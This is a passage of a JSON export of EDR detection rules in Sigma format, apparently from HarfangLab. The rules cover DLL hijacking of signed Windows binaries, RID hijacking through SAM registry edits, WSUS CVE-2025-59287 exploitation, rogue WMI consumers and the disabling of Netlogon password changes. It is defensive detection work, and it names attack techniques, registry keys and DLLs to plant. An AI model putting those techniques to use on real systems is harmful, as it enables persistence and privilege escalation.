"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b6296a9-d84f-4b67-bfee-392455db965e",
"rule_name": "DLL Hijacking via csvd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via csvd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8b67438d-82ee-44cc-8959-570f430d6788",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596136Z",
"creation_date": "2026-03-23T11:45:34.596140Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596147Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://asec.ahnlab.com/en/85942/",
"https://github.com/wgpsec/CreateHiddenAccount",
"https://attack.mitre.org/techniques/T1574/"
],
"name": "t1574_rid_hijacking.yml",
"content": "title: RID Hijacking Detected\nid: 8b67438d-82ee-44cc-8959-570f430d6788\ndescription: |\n Detects a suspicious modification of registry keys storing Windows account parameters related to RID hijacking.\n RID Hijacking is an attack technique that involves modifying the Relative Identifier (RID) value of an account with restricted privileges to match the RID value of an account with higher privileges.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://asec.ahnlab.com/en/85942/\n - https://github.com/wgpsec/CreateHiddenAccount\n - https://attack.mitre.org/techniques/T1574/\ndate: 2025/01/28\nmodified: 2025/05/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\F'\n\n filter_lsass:\n ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n\n exclusion_jumpcloud:\n ProcessImage: '?:\\Program Files\\JumpCloud\\jumpcloud-agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JumpCloud Inc'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8b67438d-82ee-44cc-8959-570f430d6788",
"rule_name": "RID Hijacking Detected",
"rule_description": "Detects a suspicious modification of registry keys storing Windows account parameters related to RID hijacking.\nRID Hijacking is an attack technique that involves modifying the Relative Identifier (RID) value of an account with restricted privileges to match the RID value of an account with higher privileges.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2025-01-28",
"rule_modified_date": "2025-05-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8ba97e80-f511-46d8-bb0a-95b03912ee6a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073404Z",
"creation_date": "2026-03-23T11:45:34.073406Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073410Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hawktrace.com/blog/CVE-2025-59287",
"https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1190_wsus_exploitation.yml",
"content": "title: Suspicious Process Spawned by WSUS\nid: 8ba97e80-f511-46d8-bb0a-95b03912ee6a\ndescription: |\n Detects a suspicious process execution by WSUS.\n This can be the result of the exploitation of the CVE-2025-59287 vulnerability that allow remote code execution via unsafe deserialization in WSUS, leading to arbitrary commands executed by the IIS worker process (w3wp.exe).\n It is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\nreferences:\n - https://hawktrace.com/blog/CVE-2025-59287\n - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\n - https://attack.mitre.org/techniques/T1190/\ndate: 2025/10/21\nmodified: 2025/10/25\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Exploit.CVE-2025-59287\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ParentImage|endswith: '\\w3wp.exe' # IIS\n ParentCommandLine|contains: ' -ap WsusPool '\n - ParentImage|endswith: '\\WsusService.exe'\n\n exclusion_image:\n Image:\n - '?:\\Windows\\System32\\inetsrv\\w3wp.exe'\n - '?:\\Program Files\\Update Services\\Services\\WsusService.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\csc.exe'\n - '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\vbc.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8ba97e80-f511-46d8-bb0a-95b03912ee6a",
"rule_name": "Suspicious Process Spawned by WSUS",
"rule_description": "Detects a suspicious process execution by WSUS.\nThis can be the result of the exploitation of the CVE-2025-59287 vulnerability that allow remote code execution via unsafe deserialization in WSUS, leading to arbitrary commands executed by the IIS worker process (w3wp.exe).\nIt is recommended to investigate the spawned process, its command-line and any scripts it might have executed to determine legitimacy.\n",
"rule_creation_date": "2025-10-21",
"rule_modified_date": "2025-10-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bbb1fe2-4deb-442f-b7d5-d2e7511696ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094574Z",
"creation_date": "2026-03-23T11:45:34.094576Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pktmon.yml",
"content": "title: DLL Hijacking via pktmon.exe\nid: 8bbb1fe2-4deb-442f-b7d5-d2e7511696ef\ndescription: |\n Detects potential Windows DLL Hijacking via pktmon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'pktmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mintdh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bbb1fe2-4deb-442f-b7d5-d2e7511696ef",
"rule_name": "DLL Hijacking via pktmon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via pktmon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bc68226-f537-44e1-88e4-c54b73787047",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075808Z",
"creation_date": "2026-03-23T11:45:34.075810Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075814Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html",
"https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
"https://attack.mitre.org/techniques/T1546/003/"
],
"name": "t1546_003_wmi_unknown_consumer.yml",
"content": "title: Unknown WMI Consumer\nid: 8bc68226-f537-44e1-88e4-c54b73787047\ndescription: |\n Detects the creation of suspicious WMI consumer using an uncommon consumer class.\n Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\n WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\n The built-in consumers are:\n - Log File: log a message in a text file;\n - Script: execute the specified code or related script;\n - Command Line: execute the specified command line;\n - Event Log: log a message in Windows event log;\n - SMTP: send an email.\n\n It is recommended to investigate the non-standard consumer to determine its legitimacy using for example the PowerShell cmdlet Get-WmiObject.\nreferences:\n - https://mgreen27.github.io/posts/2022/01/12/wmi-eventing.html\n - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\n - https://attack.mitre.org/techniques/T1546/003/\ndate: 2023/12/07\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.003\n - classification.Windows.Source.WmiEvent\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: wmi_event\ndetection:\n selection:\n EventType: 'WmiConsumerEvent'\n Operation:\n - 'Created'\n - 'Modified'\n\n filter_known_types:\n Type:\n - 'Log File'\n - 'Script'\n - 'Command Line'\n - 'Event Log'\n - 'SMTP'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bc68226-f537-44e1-88e4-c54b73787047",
"rule_name": "Unknown WMI Consumer",
"rule_description": "Detects the creation of suspicious WMI consumer using an uncommon consumer class.\nAdversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs.\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.\nThe built-in consumers are:\n - Log File: log a message in a text file;\n - Script: execute the specified code or related script;\n - Command Line: execute the specified command line;\n - Event Log: log a message in Windows event log;\n - SMTP: send an email.\n\nIt is recommended to investigate the non-standard consumer to determine its legitimacy using for example the PowerShell cmdlet Get-WmiObject.\n",
"rule_creation_date": "2023-12-07",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bda48e4-7ff5-408e-8e1f-42d16a920267",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621348Z",
"creation_date": "2026-03-23T11:45:34.621350Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621355Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://support.microsoft.com/en-us/help/154501/how-to-disable-automatic-machine-account-password-changes",
"https://attack.mitre.org/techniques/T1098/"
],
"name": "t1098_disable_netlogon_password_changes.yml",
"content": "title: Automatic Machine Account Password Changes Disabled\nid: 8bda48e4-7ff5-408e-8e1f-42d16a920267\ndescription: |\n Detects when automatic Machine Account Password changes are disabled via a registry modification.\n If automatic Machine Account Password changes are disabled, there are security risks because the security channel is used for pass-through authentication. If someone discovers a password, he can potentially perform pass-through authentication to the domain controller.\n It is recommended to check the legitimacy of this action and to verify that is is a legitimate administrative action.\nreferences:\n - https://support.microsoft.com/en-us/help/154501/how-to-disable-automatic-machine-account-password-changes\n - https://attack.mitre.org/techniques/T1098/\ndate: 2020/10/19\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ConfigChange\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\Netlogon\\Parameters\\DisablePasswordChange'\n Details|contains: 'DWORD' # Any non-zero value works, not just DWORD (0x00000001)\n\n exclusion_zero:\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_services:\n ProcessImage: '?:\\Windows\\system32\\services.exe'\n\n # https://www.faronics.com/fr/products/deep-freeze\n exclusion_faronics:\n ProcessProduct: 'Deep Freeze'\n ProcessCompany: 'Faronics Corporation'\n exclusion_script:\n ProcessParentCommandLine|contains: '?:\\temp\\WS2016Optimisations.ps1'\n ProcessParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bda48e4-7ff5-408e-8e1f-42d16a920267",
"rule_name": "Automatic Machine Account Password Changes Disabled",
"rule_description": "Detects when automatic Machine Account Password changes are disabled via a registry modification.\nIf automatic Machine Account Password changes are disabled, there are security risks because the security channel is used for pass-through authentication. If someone discovers a password, he can potentially perform pass-through authentication to the domain controller.\nIt is recommended to check the legitimacy of this action and to verify that is is a legitimate administrative action.\n",
"rule_creation_date": "2020-10-19",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1098",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8bf847a6-5f2e-4377-b978-8c7f5d1e7fdc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586572Z",
"creation_date": "2026-03-23T11:45:34.586576Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586584Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ldp.yml",
"content": "title: DLL Hijacking via ldp.exe\nid: 8bf847a6-5f2e-4377-b978-8c7f5d1e7fdc\ndescription: |\n Detects potential Windows DLL Hijacking via ldp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ldp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8bf847a6-5f2e-4377-b978-8c7f5d1e7fdc",
"rule_name": "DLL Hijacking via ldp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ldp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c2753d6-02be-49c6-b505-e84d50ac2072",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080516Z",
"creation_date": "2026-03-23T11:45:34.080518Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080523Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_curl.yml",
"content": "title: DLL Hijacking via curl.exe\nid: 8c2753d6-02be-49c6-b505-e84d50ac2072\ndescription: |\n Detects potential Windows DLL Hijacking via curl.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'curl.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\mswsock.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files (x86)\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Program Files\\WindowsApps\\MicrosoftTeams*\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8c2753d6-02be-49c6-b505-e84d50ac2072",
"rule_name": "DLL Hijacking via curl.exe",
"rule_description": "Detects potential Windows DLL Hijacking via curl.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8c5c44a0-e263-4023-a009-e8a1f996946c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095496Z",
"creation_date": "2026-03-23T11:45:34.095498Z",
"enabled": true,
"hl_status": "stable",
